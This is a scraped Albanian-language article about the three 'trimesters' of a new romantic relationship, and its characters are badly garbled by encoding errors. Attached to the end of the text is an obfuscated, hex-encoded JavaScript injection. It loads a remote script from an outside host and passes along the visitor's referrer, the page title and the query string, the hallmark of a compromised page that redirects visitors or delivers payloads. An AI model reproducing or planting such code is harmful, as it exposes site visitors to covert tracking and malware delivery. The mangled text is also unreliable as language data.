f.1113064135928_m

Dashuria lind pas tre tremujorA�ve

NA�ntA� muaj nevojiten qA� tA� lindA� foshnja, e sipas ekspertA�ve po aq muaj i nevojiten edhe njA� lidhjeje stabile, pA�r tA� jetuar tA� lumtur dhe nA� pA�rqafim tA� partnerit ideal tA� jetA�s.

Tremujori i parA�A�
Tre muajt e parA� tA� secilA�s lidhje janA� tA� mbushura me eufori dhe pasion pA�r personin tjetA�r, kA�shtu qA� gjithA� ditA�t mendojmA� pA�r takimin e sA�rishA�m dhe simpatinA� tonA�.
GjatA� kA�saj kohe nuk shohim asgjA� negative, madje edhe shprehitA� e tij jo tA� mira na duken tA� A�mbla. Seksi dhe argA�timi i mirA� na shtyn tA� mendojmA� se pA�rfundimisht e kemi gjetur personin e duhur.

Tremujori i dytA�A� caverta.
GjatA� kA�saj periudhe kohore fillojmA� ta vA�rejmA� se si partneri, tA� cilin e kemi zgjedhur nuk A�shtA� edhe aq i pA�rsosur sa dukej nA� fillim. Edhe pse provojmA� ta injorojmA� kA�tA� fakt, mangA�sitA� e tij gjithnjA� e mA� shumA� na tA�rheqin vA�mendjen. GjA�rat e vogla qA� nA� tremujorin e parA� nuk pA�rbA�nin problem, tash kanA� filluar tA� pengojnA� dhe nA� mA�nyrA� automatike i kujtojmA� pluset dhe minuset, duke i peshuar dhe menduar nA�se ia vlen tA� jemi me njA� person si ky.

Tremujori i tretA�A�
GjatA� kA�saj faze mA� seriozisht zhvillohet komunikimi, e me vetA� kA�tA� ato probleme tA� vogla bA�hen tA� zgjidhshme dhe fillojmA� tA� fokusohemi nA� anA�t pozitive tA� personit qA� dashuroj mA�. Po ashtu, kjo A�shtA� koha e duhur pA�r ta vlerA�suar nA�se duam apo nuk duam ta vazhdojmA� lidhjen.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}